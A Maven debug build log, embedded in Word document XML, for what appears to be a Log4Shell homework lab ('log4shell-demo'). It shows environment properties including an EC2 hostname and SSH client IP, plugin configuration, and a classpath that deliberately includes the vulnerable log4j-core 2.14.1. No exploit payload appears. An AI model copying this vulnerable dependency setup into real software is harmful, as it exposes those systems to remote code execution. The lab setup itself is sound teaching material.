env.LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=01;37;41:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.webp=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=01;36:*.au=01;36:*.flac=01;36:*.m4a=01;36:*.mid=01;36:*.midi=01;36:*.mka=01;36:*.mp3=01;36:*.mpc=01;36:*.ogg=01;36:*.ra=01;36:*.wav=01;36:*.oga=01;36:*.opus=01;36:*.spx=01;36:*.xspf=01;36:, jsonassert.version=1.5.0, file.encoding=UTF-8, gson.version=2.8.8, sun-mail.version=1.6.7, jakarta-annotation.version=1.3.5, env.HOSTNAME=ip-172-31-46-85.us-east-2.compute.internal, env.SHLVL=1, mssql-jdbc.version=9.2.1.jre8, snakeyaml.version=1.28, okhttp3.version=3.14.9, liquibase.version=4.3.5, httpcore.version=4.4.14, lettuce.version=6.1.5.RELEASE, classworlds.conf=/usr/share/maven/bin/m2.conf, sun.io.unicode.encoding=UnicodeLittle, kotlin.version=1.5.31, wsdl4j.version=1.6.3, tomcat.version=9.0.53, sendgrid.version=4.7.5, env.SSH_CLIENT=76.141.92.20 44903 22, glassfish-jaxb.version=2.3.5, spring-ws.version=3.1.1, commons-lang3.version=3.12.0, os.name=Linux, junit.version=4.13.2, jetty-el.version=9.0.52, env.SELINUX_USE_CURRENT_RANGE=, db2-jdbc.version=11.5.6.0, maven.build.timestamp=2025-05-29T00:36:41Z, env.SSH_CONNECTION=76.141.92.20 44903 172.31.46.85 22, reactor-bom.version=2020.0.11, maven-enforcer-plugin.version=3.0.0, jstl.version=1.2, quartz.version=2.3.2, javax-money.version=1.1, spring-hateoas.version=1.3.4, path.separator=:, env.SHELL=/bin/bash, jakarta-validation.version=2.0.2, env.HISTSIZE=1000, maven.multiModuleProjectDirectory=/home/ec2-user/log4shell-homework, oracle-database.version=21.1.0.0, env.MAVEN_PROJECTBASEDIR=/home/ec2-user/log4shell-homework, java.vm.info=mixed mode, sharing, cassandra-driver.version=4.11.3, env.USER=ec2-user, java.class.version=61.0, xml-maven-plugin.version=1.0.2, sun.jnu.encoding=UTF-8, xmlunit2.version=2.8.2, jakarta-mail.version=1.6.7, slf4j.version=1.7.32, r2dbc-bom.version=Arabba-SR10, solr.version=8.8.2, saaj-impl.version=1.5.3, nimbus-jose-jwt.version=9.10.1, maven.build.version=Apache Maven 3.8.4 (Red Hat 3.8.4-3.amzn2023.0.5), hikaricp.version=4.0.3, maven.home=/usr/share/maven, netty-tcnative.version=2.0.43.Final, </w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>maven-shade-plugin.version=3.2.4, sun.stderr.encoding=UTF-8, jakarta-json-bind.version=1.0.2, file.separator=/, line.separator=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3629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sun.stdout.encoding=UTF-8, env.SSH_TTY=/dev/pts/0, spring-kafka.version=2.7.7, jersey.version=2.33, user.name=ec2-user, hazelcast.version=4.1.5, env.SELINUX_LEVEL_REQUESTED=, jdom2.version=2.0.6, atomikos.version=4.0.6, aspectj.version=1.9.7, hsqldb.version=2.5.2, ojdbc.version=19.3.0.0, env.XDG_RUNTIME_DIR=/run/user/1000, webjars-locator-core.version=0.46, project.reporting.outputEncoding=UTF-8, env.MOTD_SHOWN=pam, env.XDG_SESSION_TYPE=tty, oauth2-oidc-sdk.version=9.9.1, awaitility.version=4.0.3, env.OLDPWD=/home/ec2-user/log4shell-homework, env.PWD=/home/ec2-user/log4shell-homework, embedded-mongo.version=3.0.0, env.LESSOPEN=||/usr/bin/lesspipe.sh %s, spring-ldap.version=2.3.4.RELEASE, java.class.path=/usr/share/maven/boot/plexus-classworlds-2.6.0.jar, dependency-management-plugin.version=1.0.11.RELEASE, env.HOME=/home/ec2-user, java.vm.vendor=Amazon.com Inc., maven-javadoc-plugin.version=3.2.0, servlet-api.version=4.0.1, rsocket.version=1.1.1, jakarta-persistence.version=2.2.3, artemis.version=2.17.0, groovy.version=3.0.9, javax-cache.version=1.1.1, logback.version=1.2.6, prometheus-pushgateway.version=0.10.0, sun.cpu.endian=little, versions-maven-plugin.version=2.8.1, user.language=en, jedis.version=3.6.3, maven-clean-plugin.version=3.1.0, javax-mail.version=1.6.2, maven-surefire-plugin.version=2.22.2, javax-annotation.version=1.3.2, spring-data-bom.version=2021.0.5, mysql.version=8.0.26, classmate.version=1.5.1, jaybird.version=4.0.3.java8, antlr2.version=2.7.7, selenium.version=3.141.59, glassfish-el.version=3.0.4, project.build.sourceEncoding=UTF-8, jooq.version=3.14.15, java.vendor.url.bug=https://github.com/corretto/corretto-17/issues/, user.dir=/home/ec2-user/log4shell-homework, ehcache.version=2.10.9.2, junit-jupiter.version=5.7.2, java.vm.version=17.0.15+6-LTS, neo4j-java-driver.version=4.2.7, jakarta-activation.version=1.2.2, spring-session-bom.version=2021.0.2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE50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2C902C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32159D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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024576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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF0468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excludes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CD85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includes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C35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35FC8C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resource with targetPath null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A69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directory /home/ec2-user/log4shell-homework/src/main/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BEBA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excludes [**/application*.yml, **/application*.yaml, **/application*.properties]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FBFEB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includes []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2368A28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002FF7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no use filter components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2E174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2404A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 --- maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37669B1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mirror maven-default-http-blocker (http://0.0.0.0/) for ow2-snapshot (http://repository.ow2.org/nexus/content/repositories/snapshots).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765963B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Dependency collection stats {ConflictMarker.analyzeTime=2292213, ConflictMarker.markTime=538100, ConflictMarker.nodeCount=118, ConflictIdSorter.graphTime=261741, ConflictIdSorter.topsortTime=32894, ConflictIdSorter.conflictIdCount=45, ConflictIdSorter.conflictIdCycleCount=0, ConflictResolver.totalTime=1225852, ConflictResolver.conflictItemCount=72, DefaultDependencyCollector.collectTime=265953307, DefaultDependencyCollector.transformTime=4379349}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E52C4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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285334B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org.apache.maven:maven-plugin-api:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1971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org.apache.maven:maven-model:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A343B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org.sonatype.sisu:sisu-inject-plexus:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E45C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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B71C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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C172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org.apache.maven:maven-artifact:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425435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org.codehaus.plexus:plexus-utils:jar:2.0.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339A5A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org.apache.maven:maven-core:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4388E1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org.apache.maven:maven-settings:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754564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org.apache.maven:maven-settings-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FB8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org.apache.maven:maven-repository-metadata:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB9D5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org.apache.maven:maven-model-builder:jar:3.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233484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org.apache.maven:maven-aether-provider:jar:3.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6BE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org.sonatype.aether:aether-impl:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D96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org.sonatype.aether:aether-spi:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7081A99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org.sonatype.aether:aether-api:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3954DD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org.sonatype.aether:aether-util:jar:1.7:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CCEAF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org.codehaus.plexus:plexus-interpolation:jar:1.14:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5DFC9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org.codehaus.plexus:plexus-classworlds:jar:2.2.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB0DD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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BF9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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516B34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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E852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org.apache.maven.shared:maven-shared-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A963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commons-io:commons-io:jar:2.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E58538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org.apache.maven.shared:maven-shared-incremental:jar:1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D89DA8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org.codehaus.plexus:plexus-java:jar:0.9.10:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C906C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org.ow2.asm:asm:jar:6.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB215D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com.thoughtworks.qdox:qdox:jar:2.0-M9:compile (version managed from default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD34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org.codehaus.plexus:plexus-compiler-api:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CB207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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A886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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AF2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Created new class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9A23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Importing foreign packages into class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4B46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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ECEF6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Populating class realm plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A82A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org.apache.maven.plugins:maven-compiler-plugin:jar:3.8.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7A829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org.sonatype.sisu:sisu-inject-bean:jar:1.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF0E7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org.sonatype.sisu:sisu-guice:jar:noaop:2.1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E24B2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org.codehaus.plexus:plexus-utils:jar:2.0.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246AA0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org.sonatype.aether:aether-util:jar:1.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACFB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org.codehaus.plexus:plexus-interpolation:jar:1.14</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4278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org.codehaus.plexus:plexus-component-annotations:jar:1.7.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1E1C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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174135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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB7342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org.apache.maven.shared:maven-shared-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E599C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commons-io:commons-io:jar:2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC698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org.apache.maven.shared:maven-shared-incremental:jar:1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C2B3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org.codehaus.plexus:plexus-java:jar:0.9.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7F9EE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org.ow2.asm:asm:jar:6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0065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com.thoughtworks.qdox:qdox:jar:2.0-M9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203283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Included: org.codehaus.plexus:plexus-compiler-api:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEEEA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org.codehaus.plexus:plexus-compiler-manager:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AFEE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org.codehaus.plexus:plexus-compiler-javac:jar:2.8.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C60C4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org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-compiler-plugin:3.8.1, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575EBA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'org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AE7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basedir = /home/ec2-user/log4shell-homework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F227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buildDirectory = /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E012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compilePath = [/home/ec2-user/log4shell-homework/target/classes, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-web/2.5.5/spring-boot-starter-web-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter/2.5.5/spring-boot-starter-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-logging/2.5.5/spring-boot-starter-logging-2.5.5.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar, /home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar, /home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar, /home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar, /home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-json/2.5.5/spring-boot-starter-json-2.5.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar, /home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-tomcat/2.5.5/spring-boot-starter-tomcat-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar, /home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar, /home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar, /home/ec2-</w:t>
      </w:r>
      <w:r w:rsidRPr="009B72F7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar, /home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-starter-log4j2/2.5.5/spring-boot-starter-log4j2-2.5.5.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-slf4j-impl/2.14.1/log4j-slf4j-impl-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar, /home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-jul/2.14.1/log4j-jul-2.14.1.jar, /home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B4E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compileSourceRoots = [/home/ec2-user/log4shell-homework/src/main/java]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F824E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compilerId = javac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050A51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debug = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E0B7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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F24B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failOnError = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2437D83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failOnWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6EC9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forceJavacCompilerUse = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E440F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fork = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441C8C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generatedSourcesDirectory = /home/ec2-user/log4shell-homework/target/generated-sources/annotations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FE4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mojoExecution = org.apache.maven.plugins:maven-compiler-plugin:3.8.1:compile {execution: default-compile}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2844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optimize = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE8F1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outputDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5253F7F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parameters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5B8D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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255CB71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projectArtifact = com.example:log4shell-demo:jar:0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E996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session = org.apache.maven.execution.MavenSession@3cd59ef5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4EB4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showDeprecation = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026976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showWarnings = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8616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skipMultiThreadWarning = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECEB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source = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670646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staleMillis = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5EF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(s) target = 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227AE39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useIncrementalCompilation = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7A311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verbose = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB9DD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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E83AB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compiler 'javac'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C490F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49EBD9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7F2F3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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7B553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org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources from plugin realm ClassRealm[plugin&gt;org.apache.maven.plugins:maven-resources-plugin:3.2.0, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C820F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'org.apache.maven.plugins:maven-resources-plugin:3.2.0:testResources' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4490016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addDefaultExcludes = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639205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buildFilters = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E8592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delimiters = [@]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B2275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encoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549BB7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escapeWindowsPaths = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E8129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fileNameFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061DE4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includeEmptyDirs = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DE698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outputDirectory = /home/ec2-user/log4shell-homework/target/test-classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468251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overwrite = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D56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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FAF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propertiesEncoding = UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A87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resources = [Resource {targetPath: null, filtering: false, FileSet {directory: /home/ec2-user/log4shell-homework/src/test/resources, PatternSet [includes: {}, excludes: {}]}}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA9E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session = org.apache.maven.execution.MavenSession@3cd59ef5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD87C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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3D46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supportMultiLineFiltering = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C36B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useBuildFilters = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2DA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(s) useDefaultDelimiters = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA74D2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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734896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properties used {spring-integration.version=5.5.4, flyway.version=7.7.3, java.specification.version=17, webjars-hal-browser.version=3325375, java.vendor.url=https://aws.amazon.com/corretto/, sun.boot.library.path=/usr/lib/jvm/java-17-amazon-corretto.x86_64/lib, sun.java.command=org.codehaus.plexus.classworlds.launcher.Launcher spring-boot:run -X, jdk.debug=release, maven.version=3.8.4, javax-activation.version=1.2.0, kafka.version=2.7.1, jboss-transaction-spi.version=7.6.1.Final, java.vm.specification.vendor=Oracle Corporation, java.specification.name=Java Platform API Specification, byte-buddy.version=1.10.22, maven-install-plugin.version=2.5.2, env.which_declare=declare -f, java.runtime.version=17.0.15+6-LTS, httpclient5.version=5.0.4, env.SELINUX_ROLE_REQUESTED=, java.vendor.version=Corretto-17.0.15.6.1, env.HISTCONTROL=ignoredups, micrometer.version=1.7.4, rxjava-adapter.version=1.2.1, project.baseUri=file:/home/ec2-user/log4shell-homework/, hibernate.version=5.4.32.Final, java.io.tmpdir=/tmp, java.version=17.0.15, javax-persistence.version=2.2, jakarta-ws-rs.version=2.1.6, build-helper-maven-plugin.version=3.2.0, mockito.version=3.9.0, java.vm.specification.name=Java Virtual Machine Specification, infinispan.version=12.1.7.Final, nekohtml.version=1.9.22, maven-assembly-plugin.version=3.3.0, native.encoding=UTF-8, java.library.path=/usr/java/packages/lib:/usr/lib64:/lib64:/lib:/usr/lib, jakarta-servlet.version=4.0.4, java.vendor=Amazon.com Inc., java.specification.maintenance.version=1, thymeleaf-extras-java8time.version=3.0.4.RELEASE, undertow.version=2.2.10.Final, mariadb.version=2.7.4, selenium-htmlunit.version=2.49.1, thymeleaf-extras-data-attribute.version=2.0.1, ehcache3.version=3.9.6, jakarta-xml-bind.version=2.3.3, commons-dbcp2.version=2.8.0, env.LANG=C.UTF-8, mongodb.version=4.2.3, java.vm.specification.version=17, javax-transaction.version=1.3, maven.compiler.source=11, env.BASH_FUNC_which%%=() {  ( alias;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB669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eval ${which_declare} ) | /usr/bin/which --tty-only --read-alias --read-functions --show-tilde --show-dot "$@"</w:t>
      </w:r>
    </w:p>
